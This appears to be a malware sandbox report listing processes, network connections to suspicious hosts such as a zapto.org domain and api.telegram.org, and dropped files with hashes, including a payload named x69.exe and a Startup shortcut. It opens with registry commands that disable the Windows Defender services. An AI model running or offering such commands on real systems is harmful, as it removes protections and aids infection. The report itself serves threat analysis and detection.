reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a19242dc-96bb-48ca-9b49-86f1ad87c554}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3f5ca867-fddd-4c7c-b435-bd2d7a17afcf}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2772 -prefsLen 35427 -prefMapHandle 5568 -prefMapSize 270279 -jsInitHandle 4732 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6540 -initialChannelId {fb3dfaa7-d842-4fb9-96c9-1be6c997c09f} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\TCPView\tcpview64.exe
"C:\Users\Admin\Downloads\TCPView\tcpview64.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\020251ea.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1c955ede.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ddos.dnsnb8.net | udp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 51.140.244.186:443 | checkappexec.microsoft.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 34.36.137.203:443 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | mc.prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | merino.services.mozilla.com | udp |
| US | 8.8.8.8:53 | mc.prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.110.138.217:443 | merino.services.mozilla.com | udp |
| US | 8.8.8.8:53 | merino.services.mozilla.com | udp |
| US | 34.110.138.217:443 | merino.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | merino.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-chains.prod.autograph.services.mozaws.net | udp |
| US | 8.8.8.8:53 | content-signature-chains.prod.autograph.services.mozaws.net | udp |
| US | 8.8.8.8:53 | example.org | udp |
| US | 8.8.8.8:53 | ipv4only.arpa | udp |
| US | 8.8.8.8:53 | prod.detectportal.prod.cloudops.mozgcp.net | udp |
| US | 34.107.221.82:80 | prod.detectportal.prod.cloudops.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.detectportal.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | grayhatgroupontop.zapto.org | udp |
| EG | 197.160.170.172:1177 | grayhatgroupontop.zapto.org | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| N/A | 127.0.0.1:50177 | tcp | |
| N/A | 127.0.0.1:50213 | tcp | |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | archive.mozilla.org | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| US | 151.101.195.19:443 | archive.mozilla.org | tcp |
| US | 8.8.8.8:53 | mozilla-download.fastly-edge.com | udp |
| US | 34.104.35.123:443 | edgedl.me.gvt1.com | tcp |
| DE | 23.53.40.129:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | mozilla-download.fastly-edge.com | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | learn.microsoft.com | udp |
| US | 8.8.8.8:53 | e13636.dscb.akamaiedge.net | udp |
| GB | 184.25.193.230:443 | learn.microsoft.com | tcp |
| US | 8.8.8.8:53 | e13636.dscb.akamaiedge.net | udp |
| US | 8.8.8.8:53 | mscom.demdex.net | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | js.monitor.azure.com | udp |
| IE | 54.170.135.45:443 | mscom.demdex.net | tcp |
| US | 8.8.8.8:53 | dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com | udp |
| US | 13.107.246.64:443 | js.monitor.azure.com | tcp |
| US | 8.8.8.8:53 | s-part-0036.t-0009.t-msedge.net | udp |
| US | 13.107.246.64:443 | s-part-0036.t-0009.t-msedge.net | tcp |
| US | 8.8.8.8:53 | s-part-0036.t-0009.t-msedge.net | udp |
| US | 8.8.8.8:53 | dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 104.208.16.95:443 | browser.events.data.microsoft.com | tcp |
| US | 104.208.16.95:443 | browser.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | onedscolprdcus20.centralus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | onedscolprdcus20.centralus.cloudapp.azure.com | udp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | onedscolprdcus20.centralus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | download.sysinternals.com | udp |
| US | 13.107.246.64:443 | download.sysinternals.com | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdeus14.eastus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | onedscolprdeus14.eastus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdcus12.centralus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | onedscolprdcus12.centralus.cloudapp.azure.com | udp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
Files
memory/5348-0-0x00007FF9D1293000-0x00007FF9D1295000-memory.dmp
memory/5348-1-0x0000000000620000-0x000000000066E000-memory.dmp
memory/5348-2-0x00007FF9D1290000-0x00007FF9D1D52000-memory.dmp
memory/5712-3-0x00007FF9D1290000-0x00007FF9D1D52000-memory.dmp
memory/5712-13-0x000001C92A1E0000-0x000001C92A202000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_okoaepuu.pyp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5712-14-0x00007FF9D1290000-0x00007FF9D1D52000-memory.dmp
memory/5712-15-0x00007FF9D1290000-0x00007FF9D1D52000-memory.dmp
memory/5712-16-0x00007FF9D1290000-0x00007FF9D1D52000-memory.dmp
memory/5712-17-0x00007FF9D1290000-0x00007FF9D1D52000-memory.dmp
memory/5712-20-0x00007FF9D1290000-0x00007FF9D1D52000-memory.dmp
C:\Users\Admin\AppData\Roaming\x69.exe
| MD5 | 143b1a26c0fdda10f74ba1b6249e020a |
| SHA1 | 30a01b28f4f205bc594f8d6665963eaa49d172e3 |
| SHA256 | 83f2f88a1de9b022867ba3659074b0c349e24d2de7d0e01e136a325a5d5eed65 |
| SHA512 | 06fca2ea01ce1828ae7f08c17d7ae111d75ae5b4c0c01c618a02551300bf25c7ad17abcb078eb0a4082bf74a052fcd3f8f63122251cf5884ec97099f495a9ce0 |
memory/3640-37-0x0000000000910000-0x0000000000928000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3eb3833f769dd890afc295b977eab4b4 |
| SHA1 | e857649b037939602c72ad003e5d3698695f436f |
| SHA256 | c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485 |
| SHA512 | c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 222210a79ce2830f0250955f430c5ec9 |
| SHA1 | 608ed33bd7b258647be8359705a40b84b2204458 |
| SHA256 | c3a3847fb06268735e00117da480bc2638b301bb765fd0e7c301fe4cad56c714 |
| SHA512 | 0f0b33a2be1791c17192d8b16a6614390b30088cb698f7528eeb15af7e6d0db2dcd6b97a93a4422b4eef641b717a9beea80ecc6ac8049708e5858a464c62072a |
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
| MD5 | 22d6b7ab5c8a05162d36d2981b715c28 |
| SHA1 | 7adc2e2c90b8dfcee0c34a86ad4d0cac79daf9f3 |
| SHA256 | f12428dc9c9f900d671d4135cfda52b7de9bfb6b34c5c336dbf88941db8575e1 |
| SHA512 | 374564a98cc8d663311cf27186aabf8b1e41f776c00f560c6d1d86758f7b6795b1b81651d414fa59af082e21c4e0fd1c475320e97f8e55942341a155c24138ce |
memory/3192-61-0x0000000000400000-0x0000000000420000-memory.dmp
memory/5348-64-0x00007FF9D1293000-0x00007FF9D1295000-memory.dmp
memory/2368-65-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
| MD5 | 56b2c3810dba2e939a8bb9fa36d3cf96 |
| SHA1 | 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc |
| SHA256 | 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07 |
| SHA512 | 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ac92965ccd2fc1fe15a7d454740615ac |
| SHA1 | 2a90c1c1f5c88bf3aae3b5f2243a17e934f47f36 |
| SHA256 | 771a29292fca03a7b287437307693c1774edb67481a8ac1c6c464fe400bb8b25 |
| SHA512 | 867cba59e359326ba38aa66c4509ef824dbf94b44353d83c20bf47bc7127530621c2f6290631b231b4f2f5c80ff0078430e0df623e21218872512aa54a03d241 |
memory/4008-80-0x0000000000E70000-0x0000000000E79000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\71A6.tmp\71A7.tmp\71A8.bat
| MD5 | 2df9441936169e60a9631bf730cd4273 |
| SHA1 | 979ee79524023a77b9577d077a3472b87fda9834 |
| SHA256 | 24ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e |
| SHA512 | ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee |
C:\Users\Admin\AppData\Local\Temp\MpCmdRun.log
| MD5 | 8933185d529bc8993e2b1e22d77c5353 |
| SHA1 | bcb59afaea6cf34154119c3199b46d763092ffb8 |
| SHA256 | aa878747ebedf6f93e5e9fca1e76a88a83a9b4114007ab720b0d563e4cebe761 |
| SHA512 | 02bbd14a90610c93b9cfbaed423ed81391b13ff0de7a95312c77de468cf0052875e7efbd71a48c205830a03a00117cf19a9186d7a48c57aff4e03f9af3a08ff9 |
memory/5348-107-0x00007FF9D1290000-0x00007FF9D1D52000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7376b700f02f6a95da86a04f76ee8990 |
| SHA1 | ac7da7c73065a4e7adc6230926be1137e1670fba |
| SHA256 | 8a444d17856bc18408c2ba87bcdb6863a3a6479e537e44d71c2be051ecfc7f1a |
| SHA512 | ec71afcccf78ec47b7f079b2e6f229109115780314b6d077bbeb852ecccdcd25aff8fc8dd543768ce55f5c9d17b62835f5e42853e849680cdc8c31ed71647bdd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d12bf0977e627c7b7f0a3b7592d68397 |
| SHA1 | b6bb910a4a2c554d9df0de4d691ec4e5e54c36bb |
| SHA256 | 8256f2f7bfc45a2c3829e2d80e064f23953dcca670fe5a86ec09c822c895dabe |
| SHA512 | 01367196d606710f73ea36216d57262b4efa612fde0c55e280607076e762f85963f3584b241bc4e67cba7fd53f6a59571378ebd116e5f1a8c824082976c86c7b |
C:\Users\Admin\AppData\Roaming\x69install.exe
| MD5 | b89953da384c6a80b03e5b3abece33c9 |
| SHA1 | 8495ca680bc958f7b1c5525c2e92200fc9fa1864 |
| SHA256 | 5e515b4a674e11cb67492b05a96074b3c04c8171023d75301f61322837c53346 |
| SHA512 | 8466ada9ac155f358c99f3b14a7fd27e87dd73d017930f5870b817f214c1466f8d2dae9d121ef671e5771f0ea789397d554295da6403872017311b8c40c58963 |
memory/1568-144-0x0000000000F00000-0x0000000000F31000-memory.dmp
memory/1368-150-0x0000000000FB0000-0x0000000000FB9000-memory.dmp
C:\Program Files\7-Zip\Uninstall.exe
| MD5 | 0e07b883a7ca26cc0812609afc7a7eba |
| SHA1 | d2721c6b4d8b0350b60c89a3bbe1ba582a39d244 |
| SHA256 | 093bbea8dfa497fa9229c131aed1ad411def246d223c5a543c48a21102897514 |
| SHA512 | 8d5ce6fb77bf346cee66e424fb613b920bca528518908daccf533d255eb04c2d79d1f4d9a9bfa10189ee2ca9f3dc677715dbd58b8d5e88f55cc3e7d061ff2ed1 |
memory/5348-151-0x00007FF9D1290000-0x00007FF9D1D52000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x69.exe.log
| MD5 | 9063108404ce873a63f55b85fc0279d7 |
| SHA1 | 4f882eed1f0ba768ae3e66e22aca9f5dfac5dfb9 |
| SHA256 | 250e4fa65135df1df0158f86699ff4520f1fd15c61ffab22f7a4cb62198e8d01 |
| SHA512 | 6ec3db7405b3c0530a23904a09ea53c67253048f13d8ea2a427663e7c8269c22166eebd725917935ce9f5441c807f5ab006094fa180b84468fd8743a3b228bb8 |
memory/1140-155-0x0000000000F00000-0x0000000000F31000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | aa01dbbc36401579da6945a9e8a72351 |
| SHA1 | 54ed8a054cee8c8e3157d592b8c485392a3af520 |
| SHA256 | a84c26ae18d442e614b068e9d8d3ad23a82529a2714b057d7dc6dd36edfb393b |
| SHA512 | 680f14b0f7d114b408cd2140842eb63f292ce4b0536e5fa1e76fc2704466fcd1f986d02b57cdba2b83980e8d1106330bc48040c0f14a00d8307cef1fd4c2f082 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 14ade977d5aee19d8d43a5545fb17aa4 |
| SHA1 | 2f09f41411cd31ea761e878ef477a0a15f037823 |
| SHA256 | 313690a5bea10becc948a438d4197abe7d6116e1f36cc094bfe63ac4b76bc704 |
| SHA512 | f7bf8a2e6a5fe5e4c60873e8e053227f7fdeb46a7336d95ae08b3aefa3e46c4310ac5185903f9854172604b1f1cdfffa7a9aeeea11464adebe6d999f46f999c9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 70e829e200994d93172199e56c369439 |
| SHA1 | 051915bb2944acc4de6b948913c7cfddaebd3aa2 |
| SHA256 | 5c09ae4bd7edd4d26fc157b2eeaf2c1dfe81dc9ff551c5f359773443de7b0d1f |
| SHA512 | b722a32b6b13a8f536743699ec13b6e2c6c8532cb2b2652d6c3b561b970e2a542f8e88b1644d91b8ace8d7ea6313ad667d0e8d3b4c6f5a51f560ded716c407fe |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b0ddca0825b7ef13b863fa04ff940ef1 |
| SHA1 | 3a17aa7ca0ec674144fc74b9e0de4767abd31d97 |
| SHA256 | 369dba1e36c0a10bb60154dd0b1756b053936aba83ab80525a5192404c16cf45 |
| SHA512 | 4a3207b28328c34617d488b4dbcf17f60eb340aacabddea71af45c1da1a624c4353f0617eeda5595cfc893be210be4cbf3fb57e99c55cd5819273211f2969e03 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a5b65e48f20a79f06b30ca3020df0ce3 |
| SHA1 | 55a2263b4bb9e5576e798d4ff0fb1e6d7bfa88cf |
| SHA256 | 0cd9d3dcec93fe4ae156a9975a9c553f6adfe8be51b1a9a9f7087b7a1424fe6e |
| SHA512 | 27fb7f3b0bc10dd9de982fe4f4b790aa33687af6e780ab454e87be1caf4607001cf2e5dd90a69a379364149ae30e7109ec6043298703e1f05beaf212f36e5b98 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5fbacf30b165d3cdd0e6e9fc51e21c37 |
| SHA1 | 60d6b501b292e10a85124ff92d35c5b5687cf55d |
| SHA256 | c036a72ad57c2375f0416e53dd01704c0b19add22d298a8ee59c56982eb62cff |
| SHA512 | ed4d371fe8f9246f23eed1e651ed8dc628de8e6b638fedf2600dda93f683ee62eb90d9da4e321290ba4ff60e8c8db84f4b6c9fc067e3b7c40ef991e36f1e87c8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3066e0895aa15bbcca5cb3f4998d2d2e |
| SHA1 | d0b8e8d1ded1dd45c15426618d61830b10f68db4 |
| SHA256 | 174027df389ac1ded72dba077728b00ebb7810eb60eac57018af7324b20a366f |
| SHA512 | 6d8bf07ee9deaeee4d998eb7860d950f4429d20191f3c54f7f60ad2e06532cb6b5c12a34269b7bb13d56dc476977fe95a216c6233aa0e23b60c1a8653a06586f |
memory/3192-307-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 29d056d9bc9b4ec73b3c65ff2ab3de06 |
| SHA1 | dc003908eba5553852886f062ad1c37072e2ffe1 |
| SHA256 | 65290526acdf94c202c88fe590659e4358495e3ad18040f6a380aae80bec3044 |
| SHA512 | f24d3803b7acbbc627655ce4ea0bf3f3f8a33ce094555688e0ff09192625c068af34cb5694dc00b7f0b9ec1d00dcc060c2df03f967bc5cdb7e3b53c69c7ef326 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9696642150e2968384f51a539e7b2f71 |
| SHA1 | 79c3a5c6cbcee2735bbe5981a97ea19ab8421753 |
| SHA256 | 9b488bc7828983ce7607bf8f11436228919f8691db27cf4a2c76a6ca644e431f |
| SHA512 | 152bbeb4074e93dfd2ca96906551885aa0f2888e95711e0e3b00de41e30f83c60f9275ead697927c12ace46a536ec86b784e5385aa6626828d4f4d33dd4471c4 |
memory/2368-357-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5e22dd1cda88782a1f52f76e748ef957 |
| SHA1 | 3231826619a06fa541e2bfb21da445bd7013b5ac |
| SHA256 | 73302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec |
| SHA512 | 75039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498 |
C:\Program Files\Mozilla Firefox\firefox.exe
| MD5 | af7223cf9bf7a64090d631c628eba868 |
| SHA1 | 7a3f7927c2539bea7a877e1a966304302a093139 |
| SHA256 | 81a0316cd0efdad79c3f268a0e25a6e7133e9ad6ebf970fe0db36cd4e87ff849 |
| SHA512 | f33a766daaaf593c22cd3dca277d4a62203280195496e2015ac1e5b7aaade0eb9af67b7f9596c206e04be2aea856b86f70d113ffb9aadeb15517e943daed410c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4fa5f7f2b1f477cfb3a38a71046ba532 |
| SHA1 | ce63ced2d4b1bb7dd148834226022bbde551613e |
| SHA256 | 83287556a9aed2744f431ba1a33cb3abf8eaf5b17bec6f9cfb241902ae0c8704 |
| SHA512 | 83d7748d4152a2a60b62af451f1e1719e297611d611c9731f9835992ed04cfb3f5f723890c3d0a671293adfb784b24bccc91817545f4ae228538f7e5ace0af97 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\pending_pings\78d83bbd-42c9-4ab7-b6de-cb4c60830a1c
| MD5 | eb8eb2305895a1f30d2800a3de33ec04 |
| SHA1 | 7b73792c6fb693d19bce767bbcfa925e0360dd3f |
| SHA256 | 6ffe61730e7734b70230e616a4a4216442f36b51558a640d3181907b6c0a23db |
| SHA512 | d76cc4e01a0efb69b7be066b1184dfa0fa51ef7d4d3ad08e513856c093ffc6f38aae8e9adef1cfd4de4954c056de35138832cd9d9abd1f64b601760bc28d8dec |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | cf28306d3f4faac4208bace84e807b1e |
| SHA1 | 29631d1478bfe25a7bccd22538197b9afe47398c |
| SHA256 | e9a7c645667ebcb964d71f35eef9087d42ff7e34b756c740cb1ee88f20c81957 |
| SHA512 | 41c69efebe934419c5b6c8172b9aa39685b9a43067de733b3d0551c0833fcb435bc5f46fea20bec11f2757ff37f051265614b050d853d2bee6cfd21b0152e66d |
memory/4008-680-0x0000000000E70000-0x0000000000E79000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\pending_pings\7788a15c-5568-4ae9-95f6-c456f507be24
| MD5 | 0fa8c729229d4b4979ab154ba114bd2c |
| SHA1 | 62a965e670d3f1fbc517fc549e36c02420aa4bc4 |
| SHA256 | 9546b90e3c81c7fd4b103786e7f7c923c350e5fab4e8f91a49544c2fb86c172f |
| SHA512 | 0621c6c91aec316b2565ebf1e5f915cbea4bc779882acc30db2b5626260d741ad0797d6b5f68d3c54b740fcb5e75b9acc3be6dc0f77524e175d58e1a3919dfe2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\events\events
| MD5 | f96812efe3611e4a604ae7d2a5143f28 |
| SHA1 | 71f6e79f6c6614193133352bc63d44c4db4d24c8 |
| SHA256 | eda6b0206d2391dc54f5e054927ae682b9bd1ae08ec52f14b6ebd804211049fe |
| SHA512 | 8eb30fa9284e25fd27fd0775e52af5ed2f2db8828260ae6557ee6696d0889ef7337bf5853d56ce4ab94ee5691c3b470234acafd1aabfe0ec5f4f55f846af0fc2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk
| MD5 | e6f4fa058b02fdb5e5b94fb371e2e8c2 |
| SHA1 | 116207652c71e201323336292d4dcaae9da40946 |
| SHA256 | c87cfa8c3c8f153bcd838a3fbeab953ff32fca6899c788c23652f4cb3265d1a7 |
| SHA512 | 3050929f72cee04813877e855f80ab8c828b6c35be323dd0ec8c96d715c0390870bb256fca70b54deb0da506227beb812bea73d784f036bd6745359d212761a7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\pending_pings\818baab3-3662-4f96-abc5-757950118d8d
| MD5 | 8d666182c9d0bcebbcdd264fdcb7a402 |
| SHA1 | 2c93952a04b3ad78ef9811fb05b1d624a60980d5 |
| SHA256 | ac3c02543700cc9374ca1d30f651919ea296fd86cfbd1b76467b8280822d8389 |
| SHA512 | 4dd7383192486f29e0413edf86855dc5deb66f2a7819d29e463676f02cdaaea028dca2f50b07dfdf035379e203dcde569578bacf2a2a3b989beca5d9e9037375 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\pending_pings\8a50ad1d-f34a-4a3c-93a8-edc47c872225
| MD5 | 7427ab32a53748a5613dfdd6b6212e87 |
| SHA1 | 243ac8e2aa1e44df0909b9eeb93946658a886a83 |
| SHA256 | 46d9ab3545e07586524bcd6e3077972b34bc99f55c4d0d70999ca68442693b04 |
| SHA512 | 4b4cf8ada57235b476dc0a2d5e3770d04e5698ed5dd494d7bb4b2577ac8035e9e1507e8a06ce75dd6cd152669125ed963914ecbefbe362078503c6f6eb0d8c20 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\pending_pings\f8b3e3ec-3b77-4576-90c5-09294f2f7bb0
| MD5 | 45c84c01ce9e86e85b0e937a33d1a96c |
| SHA1 | 0f766cda620ed5f9195c40cbffe8e82c49793cfe |
| SHA256 | b2806bb2338e6cdaa9edd3fe351cfedf547acbfd9b758b4f882237a2ed8990f4 |
| SHA512 | 561be9a4a3040e3907d9e1581531898909a9968c4d863fb5f58368169d048b44c31d40131f20e4a5382c88b1a96e62a3883ef27f5b62d44e93d2cde81c3f7471 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\pending_pings\6b60b2b6-34bf-44d8-85bb-dc6aa1cc0aa0
| MD5 | 602b849421402854d3124730af176b90 |
